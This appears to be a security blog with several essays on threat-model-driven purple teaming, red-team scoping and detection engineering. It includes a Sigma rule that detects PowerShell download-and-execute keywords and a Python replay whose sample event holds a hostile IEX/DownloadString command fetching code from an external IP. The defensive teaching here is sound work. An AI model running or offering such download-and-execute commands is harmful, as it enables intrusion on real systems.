For senior practitioners

Purple teaming with professional standards

A practitioner-led publication on threat-model discipline, detection engineering, realistic red teaming, and the operational work required to make red and blue teams genuinely effective together.

Latest essay

Most recent

11 essays published. One per week, Thursdays.

OT Security · Purple Teaming · ICS · Critical Infrastructure · 23 April 2026 · 6 min read

Purple Teaming OT: Why 'We Can't Test That' Is No Longer Acceptable

I keep hearing the same thing in conversations about operational technology security. That view made sense in 2015. It does not make sense now. The threat actors attacking energy, utilities, and critical infrastructure are not holding back out of concern for operational continuit…

Red Team · Purple Teaming · Threat Modelling · 16 April 2026 · 6 min read

How to Scope a Red Team Engagement That Tells You Something Real

Most red team engagements produce an impressive document and a set of "critical findings" that the security team could have predicted before the first phishing email was sent. The problem is usually not the red team. It's the scope conversation. Nobody has it properly.…

Purple Teaming · 10 April 2026 · 6 min read

Purple Teaming That Actually Works: A Framework for Real Collaboration

You've got a red team and a blue team. They hate each other. Red team thinks blue team is incompetent because they don't understand adversary tradecraft. Blue team thinks red team is reckless because they don't understand operational risk. They don't talk unless it's a quarterly …

Purple Teaming · 3 April 2026 · 6 min read

Why Your Red Team Tests Are Designed to Fail, And You Don't Know It

Red team comes in on Monday. They've got a scope, a timeline, and a list of techniques to test. By Friday, they've "successfully executed" initial access, lateral movement, persistence, and exfiltration. Blue team reviews the engagement. They have a list of "findings." Detection …

Purple Teaming · 20 March 2026 · 5 min read

Your Purple Team Test Failed Because Your Threat Model Is Wrong

You ran a purple team exercise last week. Your red team executed a flawless attack chain: initial access via phishing, lateral movement via Kerberos relay, privilege escalation, and data exfiltration. Picture perfect. Then you got the debrief: your EDR caught nothing. Your SIEM w…

About the author

Hugh McGauran

Cybersecurity practitioner with 25 years of experience across enterprise security, red and blue collaboration, and detection engineering. Country Manager Ireland at Armis.

Focus areas: purple team methodology, detection engineering, adversary emulation, operational realism.
Audience: senior security practitioners, technical leaders, detection engineers, red team and blue team operators.
Style: direct, field-informed, and sceptical of generic security advice that ignores environment and context.
What this publication is for

An editorial site for serious practitioners

PurpleTeamAI exists because too much security content is polished nonsense. Vendor campaigns are presented as strategy. Generic frameworks are recycled as expertise. Mature teams need something better.

This publication is for people who already understand the basics and want a more honest discussion about what to test, what to tune, what to stop doing, and how to make collaborative security actually work.

Purple Teaming · Threat Modelling

Your Purple Team Test Failed Because Your Threat Model Is Wrong

Hugh McGauran · 20 March 2026 · 5 min read

You ran a purple team exercise last week. Your red team executed a flawless attack chain: initial access via phishing, lateral movement via Kerberos relay, privilege escalation, and data exfiltration. Picture perfect.

Then you got the debrief: your EDR caught nothing. Your SIEM was silent. Your firewalls didn't alert. Your detection engineers looked at you and said, "Our tools are misconfigured."

They're wrong. And you probably are too.

The problem isn't your tools. It's that your red team tested an adversary that doesn't exist in your environment.

The Fundamental Mismatch

Here's what I see happen in most purple team programmes:

  1. Red team is given a playbook. Usually MITRE ATT&CK or some vendor-blessed "attack pattern." Test everything: initial access, lateral movement, persistence, exfil. Be creative.
  2. Blue team sits and watches. They monitor alerts. When nothing fires, they assume detection is broken. They tune. They add rules. They adjust thresholds.
  3. Repeat. Next quarter, red team runs the same tests. Still nothing fires (or things fire randomly, drowning in false positives). Conclusion: "We need better tooling."

Here's what's actually happening: You're testing threat capabilities your environment doesn't support.

An Example

Let's say you're a mid-sized financial services firm. Your threat model is: targeted APTs (FIN7, Lazarus), occasional script kiddies, insider threats.

Your environment:

  • Windows 10/11 workstations, hardened build
  • Modern domain controllers with Kerberos hardening
  • Network segmentation: finance backend on isolated VLAN, can't reach from general corp network
  • EDR deployed globally
  • No plaintext credentials stored on endpoints
  • Conditional Access enforces multi-factor authentication
  • Sensitive data is encrypted at rest

Your red team shows up and runs Mimikatz, tries Kerberos relay attacks, attempts lateral movement across network segments, and exfiltrates via unencrypted channels.

Result: EDR blocks the binaries. Lateral movement fails (segmentation). Encrypted data stays encrypted. Nothing detectable because nothing succeeds.

Your blue team concludes: "EDR is misconfigured. We need better visibility into Kerberos traffic. We need better encryption key logging."

Wrong. Those attacks don't fit your threat model. An actual FIN7 intrusion into your environment would:

  • Use living-off-the-land techniques (no Mimikatz)
  • Move laterally via legitimate admin tools (RDP, WinRM) already allowed in your firewall rules
  • Harvest credentials quietly over time, not via noisy one-shot dumping tools
  • Exfil via HTTP/HTTPS, not SMB or DNS tunneling (you'd flag those)

So your EDR's silence on those tests is not the failure it looks like: the techniques red team exercised are not the ones your adversary would use. Your tools are configured for your actual adversary, not the MITRE ATT&CK checklist.

The Real Cost of Environment-Agnostic Testing

When you run tests that don't align with your threat model:

  1. You get false confidence. Red team "successfully" executes techniques. You feel like you're being tested thoroughly. You're not. You're watching simulations that would never work in the real world.
  2. You waste blue team time. Detection engineers spend weeks building rules for attacks that will never happen to you. That time could go to hunting for actual threats or hardening critical systems.
  3. You create alert fatigue. All those detection rules for non-existent threats? They generate false positives. Your SOC tunes them down or disables them. Then an actual threat uses a legitimate technique you didn't adequately monitor.
  4. You fund vendor marketing. Tool vendors love environment-agnostic testing. It justifies upgrading to the latest SIEM module, the newest EDR feature, the fancy threat hunting platform. None of which you needed if your testing was threat-model-driven.

What Actually Works

Stop testing "everything." Start testing what you're actually at risk from.

Step 1: Define your threat model.

Ask yourself:

  • Who targets companies like mine? (Organized crime, state-sponsored, activists, insiders?)
  • What are they after? (Financial data, IP, customer PII, operational disruption?)
  • What access do they typically start with? (Phishing, supply chain, credential stuffing, insider?)
  • What's their environment awareness? (Will they know about my network segmentation? My EDR?)

Write this down. Three paragraphs, maximum. "Our primary threat is FIN7. They target financial services via spear-phishing to get initial access to non-critical systems. They spend weeks moving laterally to reach our payment processing tier."

Step 2: Map your environment against that threat.

  • What attack paths does your threat model realistically have access to?
  • Where can they move? (Based on segmentation, not assumption.)
  • What techniques are actually possible? (Not "Mimikatz might work"; does it work here?)
  • What detection gaps exist on those paths?

Step 3: Test only the relevant paths.

Your red team doesn't run the MITRE ATT&CK playbook. They run your threat playbook.

If FIN7 uses spear-phishing + living-off-the-land lateral movement, test that.

If they exfil via HTTPS, test that — and tune your detection to spot anomalous HTTPS traffic from workstations.

If they're blocked by your segmentation, celebrate the segmentation and move to the next gap.
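
Steps 2 and 3 can be sketched as a simple filter over candidate techniques. This is a minimal Python sketch, not a definitive method: the `Technique` fields, the control names, and every example entry are hypothetical, chosen only to mirror the financial services example earlier in this essay.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class Technique:
    name: str
    used_by_adversary: bool              # does the threat model say they use it?
    blocked_by: frozenset = frozenset()  # controls that stop it outright


def plan_tests(techniques, deployed_controls):
    """Split candidate techniques into ones worth testing and ones to skip."""
    to_test, skipped = [], []
    for t in techniques:
        if not t.used_by_adversary:
            skipped.append((t.name, "not in threat model"))
        elif t.blocked_by & deployed_controls:
            skipped.append((t.name, "prevented by existing controls"))
        else:
            to_test.append(t.name)
    return to_test, skipped


# Hypothetical entries for illustration only.
CANDIDATES = [
    Technique("Mimikatz credential dump", False, frozenset({"edr"})),
    Technique("RDP lateral movement with valid accounts", True),
    Technique("HTTPS exfiltration from workstation", True),
    Technique("Cross-VLAN SMB movement", True, frozenset({"segmentation"})),
]
CONTROLS = frozenset({"edr", "segmentation", "mfa"})

to_test, skipped = plan_tests(CANDIDATES, CONTROLS)
print("Test:", to_test)
print("Skip:", skipped)
```

The skipped list is worth keeping. It records why a technique was left out, which is the evidence you need when someone asks why the exercise did not cover the whole matrix.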

The Honest Conversation

Here's what I'd tell your security team:

"Your tools are configured correctly for the threats you actually face. When red team tests succeed using techniques that wouldn't work in a real intrusion, that's not a detection failure—that's a sign your test wasn't threat-driven. Let's refocus on the adversaries who can actually hurt us, and build detection for those attack paths."

This conversation is uncomfortable because it implies your purple team programme might be theatre. But it's the one that matters.

What's Next

For your next purple team exercise:

  1. Spend time defining the threat model, not selecting techniques
  2. Have blue team validate which attack paths are realistic in your environment
  3. Red team tests those paths, trying to evade detection on actual adversary techniques
  4. Blue team tunes for those specific gaps

The tests will be less flashy. You won't check every MITRE ATT&CK technique. But when red team succeeds, it means something: you've found a real gap against a real threat.

That's worth a lot more than catching Mimikatz on a hardened system that would never run it in the first place.


Further Reading:

  • MITRE ATT&CK: A framework, not a testing roadmap
  • Threat modeling: Microsoft's threat modeling guide
  • Practical Purple Teaming (Alfie Champion): Methodology for real collaboration

Have a counter-argument? Reply in the Discord community—let's debate threat modelling.


Next week: How to actually scope a red team exercise to your threat model. Plus: Real detection gaps we found in a financial services engagement.

Detection Engineering · Blue Team

Detection Engineering in a Real Environment: Why Generic Rules Fail

Hugh McGauran · 27 March 2026 · 6 min read

I walked into a SOC last month where they'd deployed 847 Sigma rules.

Eight hundred and forty-seven.

The detection engineers were proud. They'd built a comprehensive ruleset covering the entire MITRE ATT&CK framework. Every technique had detection logic. Nothing would slip through, they said.

The SOC was drowning. Sixty percent of alerts were false positives. They'd stopped tuning months ago and just turned off entire rule categories. The analysts were burnt out, clicking "snooze" on everything.

Here's what nobody told them: Generic detection rules fail in real environments because real environments aren't generic.

The Rule That Doesn't Work

Let's look at a real example. This is a common Sigma rule (simplified):


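title: Suspicious PowerShell Execution
# logsource is required for valid Sigma; 4688 is a Windows Security event
logsource:
  product: windows
  service: security
detection:
  selection:
    EventID: 4688
    # only PowerShell process creations
    NewProcessName|endswith: '\powershell.exe'
    CommandLine|contains:
      - 'IEX'
      - 'Invoke-Expression'
      - 'DownloadString'
  condition: selection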

This rule fires when PowerShell runs with suspicious keywords. Seems solid. Catches code injection, right?

Now let's deploy it in a real environment:

  1. Your software deployment tool (SCCM, Ansible, whatever) runs PowerShell scripts with DownloadString. Alert every 30 seconds. Disable the rule.
  2. Your backup vendor runs scheduled PowerShell jobs that invoke expressions. Thousands of alerts per day. Tune it out.
  3. Your developers have scripts with "IEX" in comments. Anywhere that text reaches a logged command line or script block, the rule matches on it. Noise.
  4. Your EDR has whitelisting for Microsoft-signed PowerShell; your SIEM doesn't. It alerts on things EDR already allowed.

By week two, detection engineers have disabled half the rule. By month one, it's gone. And when an attacker actually uses PowerShell injection, it's not being monitored because the rule was too noisy to keep.

The rule didn't fail because it was poorly written. It failed because it was environment-agnostic.
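
To make the noise problem concrete, here is a small Python sketch that mimics only the keyword logic of the rule and replays it over a handful of events. The hosts, command lines, and the `malicious` label are invented for illustration; a real replay would use your own process creation logs.

```python
KEYWORDS = ("IEX", "Invoke-Expression", "DownloadString")


def rule_matches(event):
    """Mimic the rule: a 4688 event whose command line contains a keyword.

    Matching is case-insensitive, as Sigma's `contains` is by default.
    """
    if event.get("EventID") != 4688:
        return False
    command_line = event.get("CommandLine", "").lower()
    return any(keyword.lower() in command_line for keyword in KEYWORDS)


# Hypothetical events for illustration only.
EVENTS = [
    {"EventID": 4688, "Host": "deploy01", "malicious": False,
     "CommandLine": "powershell -c (New-Object Net.WebClient)"
                    ".DownloadString('http://repo.internal/agent.ps1')"},
    {"EventID": 4688, "Host": "backup02", "malicious": False,
     "CommandLine": "powershell -c Invoke-Expression $job"},
    {"EventID": 4688, "Host": "ws-114", "malicious": True,
     "CommandLine": "powershell -nop -w hidden -c IEX (New-Object Net.WebClient)"
                    ".DownloadString('http://203.0.113.7/a')"},
    {"EventID": 4688, "Host": "ws-020", "malicious": False,
     "CommandLine": "notepad.exe report.txt"},
]

alerts = [e for e in EVENTS if rule_matches(e)]
false_positives = [e for e in alerts if not e["malicious"]]
print(f"{len(alerts)} alerts, {len(false_positives)} false positives")
```

Even in this toy data set, two of the three alerts come from the deployment and backup hosts. Scale that to a production estate and the one real hit is buried.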

Why Generic Rules Don't Survive Contact with Reality

Detection rules written in a vacuum assume:

  • No legitimate tools use the same technique
  • All environments have the same baseline behaviour
  • Detection can be tuned to pure signal (no noise)
  • Attackers use the same techniques in every environment

All false.

In a real environment:

1. Legitimate tooling is weird. Your backup software might use SMB in ways that look like lateral movement. Your monitoring agent might inject DLLs that look like persistence. Your deployment pipeline might run binaries with command-line obfuscation that looks like evasion.

2. Baselines vary wildly. A developer workstation runs PowerShell constantly. A kiosk never does. A bank branch server runs different software than your headquarters. A rule tuned for one environment is useless or too noisy in another.

3. Tuning for signal means losing sensitivity. You can build a rule that catches 100% of attacks. But it'll also alert on 10,000 false positives. The choice is: tune aggressively (miss attacks) or accept noise (burn out analysts). There's no free lunch.

4. Attackers adapt to your environment. An attacker who knows you monitor PowerShell won't use PowerShell. They'll use legitimate admin tools, scheduled tasks, or techniques that blend into your baseline.

The Real Problem With Sigma (and YARA, and Generic Rules)

Don't get me wrong—Sigma is excellent. Open-source, community-driven, better than nothing.

But Sigma is a language, not a solution. It's like saying "I have a hammer" and expecting to build a house. You need a builder.

When people drop Sigma rules from the internet into their SIEM without context, they get either:

  • Blindly tuned rules — so permissive they're useless
  • Overly aggressive rules — so noisy they're turned off within a week
  • Rules that don't apply — designed for environments completely different from yours

I've seen security teams import 1000 Sigma rules and then abandon 900 of them. That's not a detection programme; that's security theatre.

What Actually Works

Effective detection is built bottom-up, not top-down.

Start with your environment baseline.

Run your legitimate tools and systems for a week. Capture:

  • Normal PowerShell execution patterns (what commands, how often, from which systems)
  • Normal network connections (which systems talk to which, ports, protocols)
  • Normal process relationships (which processes spawn which children)
  • Normal file writes (where legitimate software writes, when, how often)

Write this down. This is your signal floor. Anything below this is noise; anything above is suspicious.
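
As one way to capture process relationships, the sketch below builds a baseline of parent and child process pairs per system role and flags anything not seen during the observation window. It is an illustration under assumptions: the event fields (`role`, `parent`, `child`), the `min_count` threshold, and the sample data are all hypothetical.

```python
from collections import Counter


def build_baseline(events, min_count=2):
    """Return the (role, parent, child) triples seen at least min_count times."""
    counts = Counter((e["role"], e["parent"], e["child"]) for e in events)
    return {key for key, n in counts.items() if n >= min_count}


def is_unusual(event, baseline):
    """True when this process relationship was not part of the baseline."""
    return (event["role"], event["parent"], event["child"]) not in baseline


# Hypothetical week of observations for illustration only.
DEV = {"role": "dev-workstation", "parent": "code.exe", "child": "powershell.exe"}
KIOSK = {"role": "kiosk", "parent": "explorer.exe", "child": "chrome.exe"}
ONE_OFF = {"role": "kiosk", "parent": "explorer.exe", "child": "cmd.exe"}
week = [DEV, DEV, DEV, KIOSK, KIOSK, ONE_OFF]

baseline = build_baseline(week)

suspect = {"role": "kiosk", "parent": "chrome.exe", "child": "powershell.exe"}
print(is_unusual(suspect, baseline))  # kiosk spawning PowerShell: not in baseline
print(is_unusual(DEV, baseline))      # developer PowerShell: normal here
```

Keying the baseline on system role is the point of the exercise: the same PowerShell child process is routine on a developer workstation and alarming on a kiosk.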

Then build detection for your actual threats.

Not MITRE ATT&CK. Not Sigma. Your threats. FIN7 would use living-off-the-land techniques in your environment. Ransomware would move laterally using your admin tools. Insiders would access your sensitive data paths.

Build rules for those specific paths, in your specific environment, against your specific baseline.

Example: You know that administrative access to your financial database should only come from 3 specific systems, at 2 PM on Mondays (batch job), from 2 specific service accounts.

Anything else? Alert immediately. No false positives because you know your baseline.
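
That database example translates almost directly into code. The following Python sketch is a hedged illustration: the host and account names are hypothetical, and it assumes "2 PM on Mondays" means the hour from 14:00 to 14:59 local time.

```python
from datetime import datetime

ALLOWED_HOSTS = {"batch01", "batch02", "dba-jump01"}  # hypothetical names
ALLOWED_ACCOUNTS = {"svc_batch", "svc_recon"}         # hypothetical names
ALLOWED_WEEKDAY = 0   # Monday (datetime.weekday() returns 0 for Monday)
ALLOWED_HOUR = 14     # assumed batch window: 14:00 to 14:59


def should_alert(source_host, account, when):
    """Alert on any admin access to the database outside the known baseline."""
    in_window = when.weekday() == ALLOWED_WEEKDAY and when.hour == ALLOWED_HOUR
    return not (
        source_host in ALLOWED_HOSTS
        and account in ALLOWED_ACCOUNTS
        and in_window
    )


monday_batch = datetime(2026, 3, 23, 14, 5)   # a Monday, inside the window
tuesday = datetime(2026, 3, 24, 14, 5)        # same time, wrong day

print(should_alert("batch01", "svc_batch", monday_batch))  # expected baseline
print(should_alert("ws-114", "svc_batch", monday_batch))   # unknown source host
print(should_alert("batch01", "svc_batch", tuesday))       # outside the window
```

All three conditions must hold for access to be treated as normal. A valid service account used from the wrong host, or at the wrong time, still alerts.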

Tune for precision, not coverage.

Don't try to detect every possible attack technique. Detect the ones that matter to you. Quality over quantity.

Ten precise, high-fidelity rules that catch real attacks beat 1000 rules that trigger on everything.

The Role of Generic Rules

Sigma and community rules aren't useless. They're a starting point—a hypothesis library.

Use them like this:

  1. Review — Which techniques are relevant to my threat model?
  2. Understand — What is this rule trying to catch? How does it work?
  3. Evaluate — Would this actually detect an attack in my environment, or would it be lost in noise?
  4. Adapt — Rewrite it for my baseline. Add context (system type, user, time of day). Whitelist known legitimate use cases.
  5. Test — Run it against historical data. Does it catch what you expect? How many false positives?
  6. Deploy — Only if it's precise enough to keep tuned for more than a month.

This takes time. It's not as fast as importing 800 rules. But it works.
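
The Test step is the one most teams skip, so here is a rough Python sketch of it: replay a rule over labelled historical events and look at alert volume and precision before deploying. Everything in it is an assumption for illustration, including the event shape, the `malicious` label, the host names, and the two example rules.

```python
def evaluate(rule, history, days):
    """Replay a rule over labelled historical events and summarise the result."""
    hits = [e for e in history if rule(e)]
    true_pos = sum(1 for e in hits if e["malicious"])
    total_malicious = sum(1 for e in history if e["malicious"])
    return {
        "alerts_per_day": len(hits) / days,
        "precision": true_pos / len(hits) if hits else None,
        "recall": true_pos / total_malicious if total_malicious else None,
    }


def generic_rule(event):
    """The imported rule: keyword match with no environment context."""
    return "downloadstring" in event["cmd"].lower()


DEPLOYMENT_HOSTS = {"deploy01"}  # hypothetical known-legitimate source


def adapted_rule(event):
    """Same logic, minus a documented legitimate use case."""
    return generic_rule(event) and event["host"] not in DEPLOYMENT_HOSTS


# Hypothetical week of history: six benign deployment runs, one real attack.
HISTORY = (
    [{"host": "deploy01", "malicious": False,
      "cmd": "powershell -c (...).DownloadString('http://repo.internal/agent.ps1')"}] * 6
    + [{"host": "ws-114", "malicious": True,
        "cmd": "powershell -c IEX (...).DownloadString('http://203.0.113.7/a')"}]
)

generic_result = evaluate(generic_rule, HISTORY, days=7)
adapted_result = evaluate(adapted_rule, HISTORY, days=7)
print(generic_result)
print(adapted_result)
```

One design caveat: excluding a host outright creates a blind spot if that host is ever compromised. Narrower exclusions (host plus account plus expected command line) cost more effort but leave less room to hide.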

The Uncomfortable Truth

If your detection programme consists of:

  • Rules from the internet
  • Sigma rules you didn't adapt
  • Detection thresholds you didn't tune
  • Coverage of every MITRE ATT&CK technique

...then you have a detection programme in name only. In practice, you're hoping someone else's rules work in your environment. They usually don't.

The uncomfortable part: Detection engineering is environment-specific work. It can't be outsourced to community rules or vendor defaults. It requires someone who understands:

  • Your systems (what's normal)
  • Your threats (what's dangerous)
  • Your tools (what they can actually detect)

That person is on your team. Or you don't have effective detection.

What's Next

For your detection programme:

  1. Audit your rules. How many do you actually tune and maintain? Delete the rest.
  2. Establish your baseline. Document normal behaviour for critical systems and techniques.
  3. Build environment-specific rules for your threat model. Don't import; adapt.
  4. Focus on precision. Ten good rules beat 1000 mediocre rules.
  5. Invest in the people who know your environment. That's where effective detection lives.

Further Reading:

  • Detection Engineering and Threat Hunting (Marcus Hutchins): Real-world detection work
  • Security Data Science (Andrew Pendergast): Baselining and anomaly detection
  • Florian Roth's Sigma rules: Study how they work; understand why you'll need to adapt them

Question: How many detection rules do you maintain? How many are turned off? We should talk about that.


Next week: Building a detection baseline for your critical systems. Plus: A real case where generic rules missed an entire attack.

Red Team · Purple Teaming

Why Your Red Team Tests Are Designed to Fail, And You Don't Know It

Hugh McGauran · 3 April 2026 · 6 min read

Red team comes in on Monday. They've got a scope, a timeline, and a list of techniques to test. By Friday, they've "successfully executed" initial access, lateral movement, persistence, and exfiltration.

Blue team reviews the engagement. They have a list of "findings." Detection missed everything. Security posture looks weak.

So you hire another consultant. You buy more tooling. You run the test again next quarter.

Same results.

Here's what nobody tells you: Your red team isn't testing what you think they're testing.

The Scope Problem

Let me walk you through a real engagement.

Client is a mid-market insurance company. They scope the red team exercise: "Test our security posture against advanced threats. Use realistic techniques. Show us what an attacker could do."

Red team scope:

  • Initial access (phishing, watering hole, supply chain)
  • Lateral movement (everything on the network)
  • Persistence (any means necessary)
  • Exfiltration (any data, any method)

This sounds comprehensive. It sounds realistic. It's actually a fantasy.

Reality: An attacker targeting this client doesn't have "any means necessary" access to "everything on the network." They have:

  • Initial access: Maybe phishing works. Maybe it doesn't. They don't get to pivot to every possible next step.
  • Lateral movement: They can move within the compromised subnet and maybe one adjacent network. Hard segmentation blocks them beyond that.
  • Persistence: Certain accounts and systems work; others have additional logging and monitoring.
  • Exfiltration: They can exfil data, but they're constrained by network egress points and monitoring.

But the red team scope doesn't acknowledge these constraints. So red team tests in a sandbox where every attack succeeds because they're not fighting the real environment—they're fighting an idealized version of it.

The Environment Problem

Here's where it gets messy.

Red team asks: "What systems can we access?"

Blue team (or the client) says: "Whatever an attacker could realistically access."

This is ambiguous. So red team interprets it broadly: everything reachable on the network is fair game.

What they should have asked: "What systems can an attacker realistically access given our segmentation, credential controls, and monitoring?"

The answer is usually much smaller. A real attacker targeting insurance data doesn't have access to the file servers in marketing, the development lab, or the HVAC management system. But if nobody explicitly excludes those from scope, red team tests them anyway.

Then when red team successfully gets to the marketing server (which has no monitoring), blue team documents it as a detection failure. Really, it's a scope definition failure.
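
One way to answer the better scoping question is to compute what is reachable from the initial foothold given the flows your segmentation actually permits. The sketch below does that with a breadth-first search. The segment names and the `ALLOWED_FLOWS` map are hypothetical; in practice they would come from your firewall policy, not from memory.

```python
from collections import deque

# Hypothetical segment-to-segment flows permitted by firewall policy.
ALLOWED_FLOWS = {
    "user-lan": {"app-tier"},
    "app-tier": {"claims-db"},
    "marketing": {"user-lan"},
    "hvac": set(),
    "claims-db": set(),
}


def reachable_segments(start, flows):
    """Breadth-first search over permitted flows from the initial foothold."""
    seen = {start}
    queue = deque([start])
    while queue:
        current = queue.popleft()
        for nxt in flows.get(current, ()):
            if nxt not in seen:
                seen.add(nxt)
                queue.append(nxt)
    return seen


in_scope = reachable_segments("user-lan", ALLOWED_FLOWS)
out_of_scope = set(ALLOWED_FLOWS) - in_scope
print(sorted(in_scope))
print(sorted(out_of_scope))
```

With a foothold on the user LAN, the marketing and HVAC segments never enter scope in this example, so a "finding" on the marketing server would be flagged as a scope question before it is written up as a detection failure.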

The Technique Problem

Red team gets creative. They use techniques that sound realistic but aren't actually part of any real attack chain for this environment:

  • Kerberos relay attacks (requires certain network conditions that don't exist here)
  • Memory-only persistence (requires no EDR; EDR is deployed)
  • Named pipe lateral movement (works in the test, but in production the pipes are monitored)
  • PowerShell obfuscation (their logging detects it; that logging just wasn't in play during the test)

Red team succeeds because they're testing in isolation. They're testing: "Is this technique possible?" not "Is this technique undetectable in your environment?"

Blue team thinks detection failed. Really, detection is fine—the technique just wasn't realistic.

The Time Problem

Red team has unlimited time to find a path. An attacker has limited time before they're detected.

Real attack: Attacker lands, spends 30 minutes poking around, tries three things, gets blocked/detected on the third, leaves (or adapts).

Red team test: Attacker lands, tries thirty things over a week, finds one that works, uses it, succeeds.

A week of persistent, thorough probing does not represent the speed and detection pressure of a real intrusion.

But nobody talks about this in the debrief. Red team just marks it as "successful lateral movement."

What This Means

Your red team engagement tells you:

"Over an extended period, using known techniques, with no time pressure, against systems and networks we can freely access and test, we were able to move laterally and exfiltrate data."

What it doesn't tell you:

"Against your actual threat model, in real time, with your actual monitoring and detection in place, this is what would happen."

Those are very different questions.

The Better Approach

Real-world red team engagements should be scoped to match reality:

  1. Threat-model driven scope. Don't test "everything." Test what your actual adversary would target and how they'd move.
  2. Time-limited and detection-aware. Red team doesn't have unlimited time to brute-force techniques. They have 48 hours to land, move, and exfil before they assume they're burned. Blue team knows they're in the environment and is actively hunting.
  3. Constrained to realistic access. Red team starts from an actual initial access vector (phishing, supply chain, etc.), not from "we've already compromised a workstation." They work with the access they actually get.
  4. Detection evasion is the goal, not secondary. Red team doesn't just run commands; they try to run them in ways that avoid detection. If it's immediately flagged, it fails. It doesn't matter if the technique "works."
  5. Realistic tool constraints. Red team uses tools an attacker would actually use, not just "what works in this test." If they'd use living-off-the-land, they do. If they'd avoid Mimikatz because EDR would catch it, they do.

The Uncomfortable Conversation

Here's what I'd tell a client:

"Your last red team engagement tested whether advanced techniques are possible in your environment, not whether they'd succeed in a real attack. The findings are less meaningful than you think. Let's reframe the next engagement around your actual threat model and realistic constraints."

This is hard because:

  • Red team has to work harder
  • Results are less "impressive" (maybe red team fails certain objectives)
  • It requires more collaboration between red and blue teams
  • It can't be outsourced to a generic red team vendor

But it's honest.

A Simple Test

Ask yourself:

  • Did red team use techniques because they were realistic for your threat model, or because they worked in the test?
  • Would your actual threat actor have access to every system red team tested?
  • Did red team have to evade detection, or was it just running commands and seeing what worked?
  • Were there time or detection constraints that matched a real attack, or was it an extended, unmolested testing window?

If the answer to any of these is "not really," your engagement was testing techniques, not threats.


Further Reading:

  • NIST SP 800-115 (Technical Security Testing): How to scope and run engagements properly
  • Adversary emulation vs. penetration testing: The difference matters
  • Detection-driven red teaming: A better framework

Reality check: When was your last red team engagement? What did it actually prove?


Next week: How to properly scope a red team exercise. Plus: A case study where realistic constraints changed the entire engagement outcome.

Purple Teaming · Red Team · Blue Team

Purple Teaming That Actually Works: A Framework for Real Collaboration

Hugh McGauran · 10 April 2026 · 6 min read

You've got a red team and a blue team. They hate each other.

Red team thinks blue team is incompetent because they don't understand adversary tradecraft. Blue team thinks red team is reckless because they don't understand operational risk. They don't talk unless it's a quarterly "engagement."

Then someone tells you about "purple teaming" and you think: "Problem solved."

It's not. Purple teaming is a methodology that requires real work. Most programmes fail because they're treated as a project (quarterly test) instead of a practice (continuous collaboration).

Here's how to actually do it.

The Failure Mode

Most purple team attempts follow this pattern:

Month 1: Announce purple team programme. Red and blue teams meet. There's optimism.

Month 2–3: Red team runs a "collaborative exercise." Blue team watches. Debrief is awkward. Red team did things blue team thinks are wrong. Blue team didn't detect things they think they should have.

Month 4: Nothing changes. Red team goes back to thinking about attacks. Blue team goes back to reactive defense.

Month 5: "Why aren't we purple teaming anymore?" Meeting gets scheduled.

Month 6–12: Quarterly reports replace continuous collaboration. Programme becomes checkboxes.

Why does this happen? Because purple teaming requires fundamentally different thinking, and no one allocated time for that shift.

What Purple Teaming Actually Is

Purple teaming isn't red team + blue team in the same room. It's:

Continuous, aligned, threat-model-driven collaboration between attack and defense.

That's different from:

  • Red teaming (I attack; you detect what I did)
  • Blue teaming (I defend; hope you don't break my things)
  • Penetration testing (Contract engagement with findings)
  • Security auditing (Compliance check)

Purple teaming means:

  • Red team understands blue team's detection capabilities and constraints
  • Blue team understands attack sequences and threat actor patterns
  • Both teams align on what matters (threat model)
  • Both teams iterate continuously to improve both attack and defense
  • Collaboration is built into operations, not scheduled quarterly

The Framework

Here's how to actually build it:

1. Establish Shared Threat Model (Week 1)

Red and blue teams sit together. No red team slides, no blue team slides. Just reality.

Questions to answer together:

  • Who threatens us? (Be specific: APT groups, competitors, insiders, criminals)
  • What do they want? (Data, disruption, espionage, financial gain)
  • How do they typically access our environment? (Phishing, supply chain, stolen creds, physical access)
  • What paths exist from initial access to objective? (Not "any path"—realistic paths given our segmentation and security controls)
  • How much time do they have? (Minutes? Hours? Days?)
  • What detection would burn them? (At what point does our environment go "we're under attack"?)

Document this. Literally write it down. "We believe APT28 targets financial services via spear-phishing for initial access. They move laterally within 2-4 hours. They exfil via HTTPS to infrastructure we can't block."

This is not a consultant document. This is the shared foundation.

2. Map Realistic Attack Paths (Week 2–3)

Now, given that threat model, what are the actual attack paths?

Not "everything MITRE ATT&CK says is possible." The paths your threat model actually uses.

Draw them:


Initial Access (phishing email)
    ↓
User clicks, code executes (PowerShell, Word macro, whatever)
    ↓
Reverse shell / beaconing established
    ↓
Lateral movement to: [SQL server? File server? DC? Not everywhere—only where they'd go]
    ↓
Objective: [Exfil financial data? Plant backdoor? Disrupt systems?]

Blue team adds detection points:


Initial Access → EDR monitors suspicious process execution
    ↓ (if they evade)
Reverse shell → Firewall monitors outbound HTTPS to unknown IPs
    ↓ (if they evade)
Lateral movement → Network monitoring for admin tool usage on [specific systems]
    ↓ (if they evade)
Objective → Data loss prevention monitors file access patterns

Now you have an attack sequence + detection sequence. This is what you test. Not everything. This.
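
If it helps to keep the two sequences in one place, they can be held as data and queried. This Python sketch is only an illustration of that idea: the stage names and detection labels are shorthand for the diagrams above, and the `evaded` set is a hypothetical record of what red team got past in an exercise.

```python
ATTACK_PATH = ["initial_access", "c2_beacon", "lateral_movement", "objective"]

DETECTIONS = {
    "initial_access": ["EDR: suspicious process execution"],
    "c2_beacon": ["Firewall: outbound HTTPS to unknown IPs"],
    "lateral_movement": ["Network monitoring: admin tool usage"],
    "objective": ["DLP: file access patterns"],
}


def first_detection(path, detections, evaded):
    """Return (stage, detection) for the first detection the attacker did not evade."""
    for stage in path:
        for detection in detections.get(stage, []):
            if (stage, detection) not in evaded:
                return stage, detection
    return None  # attacker reached the objective unseen


def uncovered_stages(path, detections):
    """Stages on the path with no detection point at all."""
    return [stage for stage in path if not detections.get(stage)]


# Hypothetical exercise result: red team evaded the first two detection points.
evaded = {
    ("initial_access", "EDR: suspicious process execution"),
    ("c2_beacon", "Firewall: outbound HTTPS to unknown IPs"),
}

print(first_detection(ATTACK_PATH, DETECTIONS, evaded))
print(uncovered_stages(ATTACK_PATH, DETECTIONS))
```

A `None` from `first_detection` is the result that matters most: the full path completed without a single detection point firing.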

3. Red Team Operates Within Constraints (Ongoing)

Red team's job changes. They don't try to breach the environment. They try to follow the realistic threat path while evading detection.

Rules:

  • Start from your actual initial access vector (phishing, not "assume we're already in")
  • Move only to systems your threat model would target
  • Use tools/techniques your threat model would use
  • Avoid detection; don't just run commands

When red team succeeds: "We executed the modelled attack path end to end without being detected."

